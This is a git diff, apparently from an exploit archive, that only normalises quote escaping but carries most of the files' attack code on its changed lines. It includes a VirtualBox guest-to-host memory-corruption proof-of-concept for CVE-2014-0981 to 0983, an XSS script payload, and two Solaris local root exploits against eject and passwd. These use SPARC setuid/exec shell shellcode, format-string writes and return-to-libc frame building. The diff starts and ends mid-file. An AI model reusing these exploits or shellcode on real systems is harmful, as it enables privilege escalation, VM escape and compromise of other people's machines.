have been found in the code @@ -95,13 +95,13 @@ corruption vulnerabilities, as described below. [CVE-2014-0981] The first vulnerability is caused by a *design flaw* in Chromium. The Chromium server makes use -of \"*network pointers*\". As defined in Chromium\'s documentation, -\'\"Network pointers are +of "*network pointers*". As defined in Chromium's documentation, +'"Network pointers are simply memory addresses that reside on another machine.[...] The networking layer will then -take care of writing the payload data to the specified address.\"\'[2] +take care of writing the payload data to the specified address."'[2] -So the Chromium\'s server code, which runs in the context of the +So the Chromium's server code, which runs in the context of the VirtualBox hypervisor in the Host OS, provides a write-what-where memory corruption primitive *by design*, which @@ -110,9 +110,9 @@ data in the hypervisor process from within a virtual machine. This is the code of the vulnerable function [file -\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can -be reached by sending a \'CR_MESSAGE_READBACK\' message to the -\'VBoxSharedCrOpenGL\' service: +'src/VBox/GuestHost/OpenGL/util/net.c'], which can +be reached by sending a 'CR_MESSAGE_READBACK' message to the +'VBoxSharedCrOpenGL' service: /----- @@ -139,12 +139,12 @@ crNetRecvReadback( CRMessageReadback *rb, unsigned int len ) -----/ -Note that \'rb\' points to a \'CRMessageReadback\' structure, which is fully +Note that 'rb' points to a 'CRMessageReadback' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering commands to the Host side. -The \'len\' parameter is also fully controlled from the Guest side, so -it\'s possible to: +The 'len' parameter is also fully controlled from the Guest side, so +it's possible to: 1. decrement the value stored at any memory address within the address space of the hypervisor. @@ -154,13 +154,13 @@ the hypervisor. 7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability* [CVE-2014-0982] The second vulnerability is closely related to the first -one, and it\'s also caused by Chromium\'s -\"*network pointers*\". +one, and it's also caused by Chromium's +"*network pointers*". This is the code of the vulnerable function [file -\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can -be reached by sending a \'CR_MESSAGE_WRITEBACK\' message to the -\'VBoxSharedCrOpenGL\' service: +'src/VBox/GuestHost/OpenGL/util/net.c'], which can +be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the +'VBoxSharedCrOpenGL' service: /----- @@ -178,10 +178,10 @@ crNetRecvWriteback( CRMessageWriteback *wb ) -----/ -Note that \'rb\' points to a \'CRMessageWriteback\' structure, which is +Note that 'rb' points to a 'CRMessageWriteback' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering -commands to the Host side, so it\'s possible to +commands to the Host side, so it's possible to decrement the value stored at any memory address within the address space of the hypervisor. @@ -192,11 +192,11 @@ Vulnerability* [CVE-2014-0983] When an OpenGL application running inside a VM sends rendering commands (in the form of opcodes + data for those opcodes) through -a \'CR_MESSAGE_OPCODES\' message, the Chromium server will handle them in -the \'crUnpack\' function. -The code for the \'crUnpack\' function is automatically generated by the +a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in +the 'crUnpack' function. +The code for the 'crUnpack' function is automatically generated by the Python script located -at \'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py\'. +at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'. This function is basically a big switch statement dispatching different functions according to the opcode being processed: @@ -212,7 +212,7 @@ void crUnpack( const void *data, const void *opcodes, for (i = 0 ; i < num_opcodes ; i++) { - /*crDebug(\"Unpacking opcode \\%d\", *unpack_opcodes);*/ + /*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/ switch( *unpack_opcodes ) { case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break; @@ -222,9 +222,9 @@ void crUnpack( const void *data, const void *opcodes, -----/ -When the opcode being processed is \'CR_VERTEXATTRIB4NUBARB_OPCODE\' -(\'0xEA\'), -the function to be invoked is \'crUnpackVertexAttrib4NubARB\': +When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE' +('0xEA'), +the function to be invoked is 'crUnpackVertexAttrib4NubARB': /----- @@ -235,9 +235,9 @@ break; -----/ -The \'crUnpackVertexAttrib4NubARB\' function reads 5 values from the +The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the opcode data sent by the Chromium client, -and just invokes \'cr_unpackDispatch.VertexAttrib4NubARB\' with those 5 +and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5 values as arguments: @@ -255,11 +255,11 @@ static void crUnpackVertexAttrib4NubARB(void) -----/ -\'VertexAttrib4NubARB\' is a function pointer in a dispatch table, and +'VertexAttrib4NubARB' is a function pointer in a dispatch table, and points to the function -\'crServerDispatchVertexAttrib4NubARB\', whose code is generated by the +'crServerDispatchVertexAttrib4NubARB', whose code is generated by the Python script located at -\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\': +'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py': /----- @@ -273,11 +273,11 @@ z, w ); -----/ -Note that the \'index\' parameter, which is a 4-byte integer coming from +Note that the 'index' parameter, which is a 4-byte integer coming from an untrusted source (the opcode data sent by the Chromium client from the VM), is used as an index within the -\'cr_server.current.c.vertexAttrib.ub4\' -array in order to write \'cr_unpackData\' (which is a pointer to the +'cr_server.current.c.vertexAttrib.ub4' +array in order to write 'cr_unpackData' (which is a pointer to the attacker-controlled opcode data), without validating that the index is within the bounds of the array. This issue can be leveraged to corrupt arbitrary memory with a pointer @@ -285,7 +285,7 @@ to attacker-controlled data. Also note that *the same vulnerability affects several functions* whose code is generated by the -\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\' +'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py' Python script: @@ -324,15 +324,15 @@ crServerDispatchVertexAttrib4sARB /----- -#include \"stdafx.h\" +#include "stdafx.h" #include -#include \"vboxguest2.h\" -#include \"vboxguest.h\" -#include \"err.h\" -#include \"vboxcropenglsvc.h\" -#include \"cr_protocol.h\" +#include "vboxguest2.h" +#include "vboxguest.h" +#include "err.h" +#include "vboxcropenglsvc.h" +#include "cr_protocol.h" -#define VBOXGUEST_DEVICE_NAME \"\\\\\\\\.\\\\VBoxGuest\" +#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest" HANDLE open_device(){ @@ -345,10 +345,10 @@ HANDLE open_device(){ NULL); if (hDevice == INVALID_HANDLE_VALUE){ - printf(\"[-] Could not open device %s .\\n\", VBOXGUEST_DEVICE_NAME); + printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME); exit(EXIT_FAILURE); } - printf(\"[+] Handle to %s: 0x%X\\n\", VBOXGUEST_DEVICE_NAME, hDevice); + printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice); return hDevice; @@ -362,24 +362,24 @@ uint32_t do_connect(HANDLE hDevice){ memset(&info, 0, sizeof(info)); info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing; - strcpy(info.Loc.u.host.achName, \"VBoxSharedCrOpenGL\"); + strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function do_connect()! -LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function do_connect()! +LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ - printf(\"HGCM connect was successful: client id =0x%x\\n\", + printf("HGCM connect was successful: client id =0x%x\n", info.u32ClientID); } else{ //If 3D Acceleration is disabled, info.result value will be -2900. - printf(\"[-] HGCM connect failed. Result: %d (Is 3D Acceleration -enabled??)\\n\", info.result); + printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration +enabled??)\n", info.result); exit(EXIT_FAILURE); } return info.u32ClientID; @@ -393,20 +393,20 @@ void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){ memset(&info, 0, sizeof(info)); info.u32ClientID = u32ClientID; - printf(\"Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\\n\"); + printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function -do_disconnect()! LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function +do_disconnect()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ - printf(\"HGCM disconnect was successful.\\n\"); + printf("HGCM disconnect was successful.\n"); } else{ - printf(\"[-] HGCM disconnect failed. Result: %d\\n\", info.result); + printf("[-] HGCM disconnect failed. Result: %d\n", info.result); exit(EXIT_FAILURE); } @@ -433,16 +433,16 @@ void set_version(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function set_version()! -LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function set_version()! +LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); + printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ - printf(\"Host didn\'t accept our version.\\n\"); + printf("Host didn't accept our version.\n"); exit(EXIT_FAILURE); } } @@ -466,16 +466,16 @@ void set_pid(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function set_pid()! -LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function set_pid()! +LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); + printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ - printf(\"Host didn\'t like our PID %d\\n\", GetCurrentProcessId()); + printf("Host didn't like our PID %d\n", GetCurrentProcessId()); exit(EXIT_FAILURE); } @@ -501,7 +501,7 @@ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){ *((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999; memcpy(&mybuf, &msg, sizeof(msg)); - strcpy(mybuf + sizeof(msg), \"Hi hypervisor!\"); + strcpy(mybuf + sizeof(msg), "Hi hypervisor!"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; @@ -521,16 +521,16 @@ memcpy: sizeof(mybuf) - 0x18 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function -trigger_message_readback()!. LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function +trigger_message_readback()!. LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); + printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ - printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); + printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } } @@ -553,7 +553,7 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){ *((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD; memcpy(&mybuf, &msg, sizeof(msg)); - strcpy(mybuf + sizeof(msg), \"dummy\"); + strcpy(mybuf + sizeof(msg), "dummy"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; @@ -573,16 +573,16 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function -trigger_message_writeback()! LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function +trigger_message_writeback()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); + printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ - printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); + printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } @@ -646,16 +646,16 @@ negative index used to trigger the memory corruption sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf(\"ERROR: DeviceIoControl failed in function -trigger_opcode_0xea()! LastError: %d\\n\", GetLastError()); + printf("ERROR: DeviceIoControl failed in function +trigger_opcode_0xea()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); + printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ - printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); + printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } @@ -676,19 +676,19 @@ void poc(int option){ switch (option){ case 1: - printf(\"[1] triggering the first bug...\\n\"); + printf("[1] triggering the first bug...\n"); trigger_message_readback(hDevice, u32ClientID); break; case 2: - printf(\"[2] triggering the second bug...\\n\"); + printf("[2] triggering the second bug...\n"); trigger_message_writeback(hDevice, u32ClientID); break; case 3: - printf(\"[3] triggering the third bug...\\n\"); + printf("[3] triggering the third bug...\n"); trigger_opcode_0xea(hDevice, u32ClientID); break; default: - printf(\"[!] Unknown option %d.\\n\", option); + printf("[!] Unknown option %d.\n", option); } /* Disconnect from the VBoxSharedCrOpenGL service */ @@ -702,13 +702,13 @@ void poc(int option){ int main(int argc, char* argv[]) { if (argc < 2){ - printf(\"Usage: %s - - + + "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT> -
- - +
+ + ------------- #################### 4. Solution: diff --git a/platforms/solaris/local/197.c b/platforms/solaris/local/197.c index 2152e8930..1372f2ff8 100755 --- a/platforms/solaris/local/197.c +++ b/platforms/solaris/local/197.c @@ -26,23 +26,23 @@ #define NOP 0xac15a16e -#define VULPROG \"/usr/bin/eject\" +#define VULPROG "/usr/bin/eject" -char shellcode[] = /* from scz\'s funny shellcode for SPARC */ - \"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */ - \"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */ - \"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\" - \"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\" - \"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\" - \"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\" - \"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\" - \"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"; +char shellcode[] = /* from scz's funny shellcode for SPARC */ + "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */ + "\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */ + "\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08" + "\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" + "\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e" + "\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07" + "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" + "\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff"; /* get current stack point address */ long get_sp(void) { - __asm__(\"mov %sp,%i0\"); + __asm__("mov %sp,%i0"); } /* prints a long to a string */ @@ -78,14 +78,14 @@ void create_shellbuf(char* shellbuf, int align, int retloc) /* check align parameter */ if (align < 0 || align > 3) { - printf(\"Error: align is %d, it should be between 0 and 3\\n\", align); + printf("Error: align is %d, it should be between 0 and 3\n", align); exit(1); } /* check retloc parameter */ if (contains_zero(retloc) || contains_zero(retloc+2) ) { - printf(\"Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\\n\", retloc, retloc+2); + printf("Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\n", retloc, retloc+2); exit(1); } @@ -127,7 +127,7 @@ void create_shellbuf(char* shellbuf, int align, int retloc) /* at this point the shell buffer should be exactly SHELL bytes long, including the null-terminator */ if (strlen(shellbuf) + 1 != SHELL) { - printf(\"Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\\n\", + printf("Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\n", strlen(shellbuf)+1, SHELL); exit(1); } @@ -145,32 +145,32 @@ void execute_vulnprog(char* pattern, char* shellbuf) /* create message files */ if (strlen(pattern) > 512) { - printf(\"Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\\n\", strlen(pattern)); + printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern)); } - if ( !(fp = fopen(\"messages.po\", \"w+\")) ) { - perror(\"Error openning messages.po for writing.\"); + if ( !(fp = fopen("messages.po", "w+")) ) { + perror("Error openning messages.po for writing."); exit(1); } - fprintf(fp, \"domain \\\"messages\\\"\\n\"); - fprintf(fp, \"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\"); - fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", pattern); + fprintf(fp, "domain \"messages\"\n"); + fprintf(fp, "msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n"); + fprintf(fp, "msgstr \"%s\\n\"", pattern); fclose(fp); - system(\"/usr/bin/msgfmt messages.po\"); - system(\"cp messages.mo SUNW_OST_OSCMD\"); - system(\"cp messages.mo SUNW_OST_OSLIB\"); + system("/usr/bin/msgfmt messages.po"); + system("cp messages.mo SUNW_OST_OSCMD"); + system("cp messages.mo SUNW_OST_OSLIB"); /* prepere the environment for the VULNPROG process */ - env[0] = \"NLSPATH=:.\"; + env[0] = "NLSPATH=:."; env[1] = shellbuf; /* put the shellbuf in env */ env[2] = NULL; /* end of env */ /* execute the vulnerable program using our custom environment */ - execle(VULPROG, VULPROG, \"-x\", NULL, env); + execle(VULPROG, VULPROG, "-x", NULL, env); } @@ -178,18 +178,18 @@ void execute_vulnprog(char* pattern, char* shellbuf) void usage(char *prg) { - printf(\"Usage:\\n\"); - printf(\" %s [command] [options]\\n\\n\", prg); - printf(\"Commands:\\n\"); - printf(\" dump Dumps the stack\\n\"); - printf(\" shell Dumps the shell buffer\\n\"); - printf(\" exploit Exploits /usr/bin/eject\\n\\n\"); - printf(\"Options:\\n\"); - printf(\" --num=96 Number of words to dump from the stack\\n\"); - printf(\" --align=2 Sets the alignment (0, 1, 2 or 3)\\n\"); - printf(\" --shellofs=-6 Offset of the shell buffer\\n\"); - printf(\" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\\n\"); - printf(\" --retloc=0xeffffa3c Location of the return address\\n\"); + printf("Usage:\n"); + printf(" %s [command] [options]\n\n", prg); + printf("Commands:\n"); + printf(" dump Dumps the stack\n"); + printf(" shell Dumps the shell buffer\n"); + printf(" exploit Exploits /usr/bin/eject\n\n"); + printf("Options:\n"); + printf(" --num=96 Number of words to dump from the stack\n"); + printf(" --align=2 Sets the alignment (0, 1, 2 or 3)\n"); + printf(" --shellofs=-6 Offset of the shell buffer\n"); + printf(" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\n"); + printf(" --retloc=0xeffffa3c Location of the return address\n"); exit(0); } @@ -212,20 +212,20 @@ main(int argc, char **argv) usage(argv[0]); } - if (!strncmp(argv[1], \"dump\", 4)) { dump = 1; } - else if(!strncmp(argv[1], \"shell\", 5)) { shell = 1; } - else if(!strncmp(argv[1], \"exploit\", 7)) { exploit = 1; } + if (!strncmp(argv[1], "dump", 4)) { dump = 1; } + else if(!strncmp(argv[1], "shell", 5)) { shell = 1; } + else if(!strncmp(argv[1], "exploit", 7)) { exploit = 1; } else { usage(argv[0]); } for (i = 2; i < argc; i++) { - if ( (sscanf(argv[i], \"--align=%d\", &align) || - sscanf(argv[i], \"--num=%d\", &num) || - sscanf(argv[i], \"--shellofs=%d\", &shellofs) || - sscanf(argv[i], \"--retlocofs=%d\", &retlocofs) || - sscanf(argv[i], \"--retloc=%x\", &retloc))== 0) { - printf(\"Unrecognized option %s\\n\\n\", argv[i]); + if ( (sscanf(argv[i], "--align=%d", &align) || + sscanf(argv[i], "--num=%d", &num) || + sscanf(argv[i], "--shellofs=%d", &shellofs) || + sscanf(argv[i], "--retlocofs=%d", &retlocofs) || + sscanf(argv[i], "--retloc=%x", &retloc))== 0) { + printf("Unrecognized option %s\n\n", argv[i]); usage(argv[0]); } } @@ -243,54 +243,54 @@ main(int argc, char **argv) /* sh_add now points to the beginning of the shell buffer */ - printf(\"Calculated shell buffer address: 0x%x\\n\", sh_addr); + printf("Calculated shell buffer address: 0x%x\n", sh_addr); if (shell == 1) { put_long(&shellbuf[align], sh_addr); /* put sh_addr on the stack */ } if ( ((sh_addr + align) & 0xfffffffc) != (sh_addr + align) ) { - printf(\"Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\\n\"); + printf("Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\n"); } if (retloc == RETLOC) { /* if retloc was not specified on the command line, calculate it */ retloc = sh_addr + align - num*4 + retlocofs; - printf(\"Calculated retloc: 0x%x\\n\", retloc); + printf("Calculated retloc: 0x%x\n", retloc); put_long(&shellbuf[align+4], retloc); put_long(&shellbuf[align+12], retloc+2); } jmp_addr = (sh_addr + align) + 64; /* Calculate the shell jump location */ - printf(\"Calculated shell code jump location: 0x%x\\n\\n\", jmp_addr); + printf("Calculated shell code jump location: 0x%x\n\n", jmp_addr); /* create the format string */ ptr = pattern; for (i = 0; i < num; i++) { - memcpy(ptr, \"%.8x\", 4); + memcpy(ptr, "%.8x", 4); ptr = ptr + 4; } if (dump == 1) { *ptr = 0; /* null-terminate */ - printf(\"Stack dump mode, dumping %d words\\n\", num); + printf("Stack dump mode, dumping %d words\n", num); } else if (shell == 1) { - sprintf(ptr, \" Shell buffer: %%s\"); + sprintf(ptr, " Shell buffer: %%s"); - printf(\"shellbuf (length = %d): %s\\n\\n\", strlen(shellbuf)+1, shellbuf); - printf(\"Shell buffer dump mode, shell buffer address is 0x%x\\n\", sh_addr); + printf("shellbuf (length = %d): %s\n\n", strlen(shellbuf)+1, shellbuf); + printf("Shell buffer dump mode, shell buffer address is 0x%x\n", sh_addr); } else { reth = (jmp_addr >> 16) & 0xffff; retl = (jmp_addr >> 0) & 0xffff; - sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\", (reth - num * 8), (retl - reth)); - printf(\"Exploit mode, jumping to 0x%x\\n\", jmp_addr); + sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (reth - num * 8), (retl - reth)); + printf("Exploit mode, jumping to 0x%x\n", jmp_addr); } - printf(\"num: %d\\t\\talign: %d\\tshellofs: %d\\tretlocofs: %d\\tretloc: 0x%x\\n\\n\", + printf("num: %d\t\talign: %d\tshellofs: %d\tretlocofs: %d\tretloc: 0x%x\n\n", num, align, shellofs, retlocofs, retloc); /* execute the vulnerable program using our custom environment */ diff --git a/platforms/solaris/local/20186.c b/platforms/solaris/local/20186.c index 51fefe4b9..ec9323f83 100755 --- a/platforms/solaris/local/20186.c +++ b/platforms/solaris/local/20186.c @@ -23,11 +23,11 @@ It should be noted under Linux this problem must be exploited in conjunction wit * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. * ./ex -o -4 ) * - * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'` + * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'` * usages: ./ex -h * * Thanks for Ivan Arce who found this bug. - * Thanks for horizon\'s great article about defeating noexec stack for Solaris. + * Thanks for horizon's great article about defeating noexec stack for Solaris. * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. @@ -44,20 +44,20 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define BUFSIZE 2048 /* the size of format string buffer*/ #define BUFF 128 /* the progname buffer size */ -#define SHELL \"/bin/ksh\" /* shell name */ +#define SHELL "/bin/ksh" /* shell name */ #define DEFAULT_NUM 68 /* format strings number */ #define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */ -#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */ +#define VULPROG "/usr/bin/passwd" /* vulnerable program name */ void usages(char *progname) { int i; - printf(\"Usage: %s \\n\", progname); - printf(\" [-h] Help menu\\n\"); - printf(\" [-n number] format string\'s number\\n\"); - printf(\" [-a align] retloc buffer alignment\\n\"); - printf(\" [-o offset] retloc offset\\n\\n\"); + printf("Usage: %s \n", progname); + printf(" [-h] Help menu\n"); + printf(" [-n number] format string's number\n"); + printf(" [-a align] retloc buffer alignment\n"); + printf(" [-o offset] retloc offset\n\n"); } @@ -65,7 +65,7 @@ void usages(char *progname) long get_sp(void) { - __asm__(\"mov %sp,%i0\"); + __asm__("mov %sp,%i0"); } @@ -97,22 +97,22 @@ main( int argc, char **argv ) strncpy(progname, argv[0], BUFF-1); - while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1) + while ((opt = getopt(argc, argv, "n:a:o:h")) != -1) switch((char)opt) { - case \'n\': + case 'n': num = atoi(optarg); break; - case \'a\': + case 'a': align = atoi(optarg); break; - case \'o\': + case 'o': offset = atoi(optarg); break; - case \'?\': - case \'h\': + case '?': + case 'h': default: usages(progname); exit(0); @@ -125,8 +125,8 @@ main( int argc, char **argv ) /* Construct fake frame in environ */ - env[0] = \"NLSPATH=:.\"; - env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */ + env[0] = "NLSPATH=:."; + env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */ /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */ env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */ env[3]=&(fakeframe[40]);/* |0x00 */ @@ -136,17 +136,17 @@ main( int argc, char **argv ) env[7]=SHELL; /* shell strings */ env[8]=NULL; - /* calculate the length of \"VULPROG\" + argv[1] */ - arg_len = strlen(VULPROG) + strlen(\"-z\") + 2; + /* calculate the length of "VULPROG" + argv[1] */ + arg_len = strlen(VULPROG) + strlen("-z") + 2; /* calculate the pad nummber . - * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can + * We manage to let the length of padding + arg_len + "NLSPATH=." can * be divided by 4. So fakeframe address is aligned with 4, otherwise - * the exploit won\'t work. + * the exploit won't work. */ pad = 3 - (arg_len + strlen(env[0]) +1)%4; - memset(padding, \'A\', pad); - padding[pad] = \'\\0\'; + memset(padding, 'A', pad); + padding[pad] = '\0'; /* get environ length */ env_len = 0; @@ -162,21 +162,21 @@ main( int argc, char **argv ) * ^ ^ * |__startaddr |__sp_addr * - * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) + * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) * - * I find \"startaddr\" always can be divided by 4. - * So we can adjust the padding\'s size to let the fakeframe address + * I find "startaddr" always can be divided by 4. + * So we can adjust the padding's size to let the fakeframe address * can be aligned with 4. * - * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" + * len = length of "argv" + "env" + "platform" + "program name" * if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4 * if (len%4)==0, sp_addr - startaddr = len - * So we can get every entry\'s address precisely based on startaddr or sp_addr. - * Now we won\'t be bored with guessing the alignment and offset.:) + * So we can get every entry's address precisely based on startaddr or sp_addr. + * Now we won't be bored with guessing the alignment and offset.:) */ len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1; - printf(\"len = %#x\\n\", len); + printf("len = %#x\n", len); /* get stack bottom address */ @@ -189,7 +189,7 @@ main( int argc, char **argv ) sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */ - strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ; - printf(\"SHELL address = %#x\\n\", sh_addr); + printf("SHELL address = %#x\n", sh_addr); /* get our fake frame address */ fp_addr = sh_addr - 8*8 - 1; @@ -197,27 +197,27 @@ main( int argc, char **argv ) /* get execl() address */ if (!(handle=dlopen(NULL,RTLD_LAZY))) { - fprintf(stderr,\"Can\'t dlopen myself.\\n\"); + fprintf(stderr,"Can't dlopen myself.\n"); exit(1); } - if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL) + if ((execl_addr=(long)dlsym(handle,"execl"))==NULL) { - fprintf(stderr,\"Can\'t find 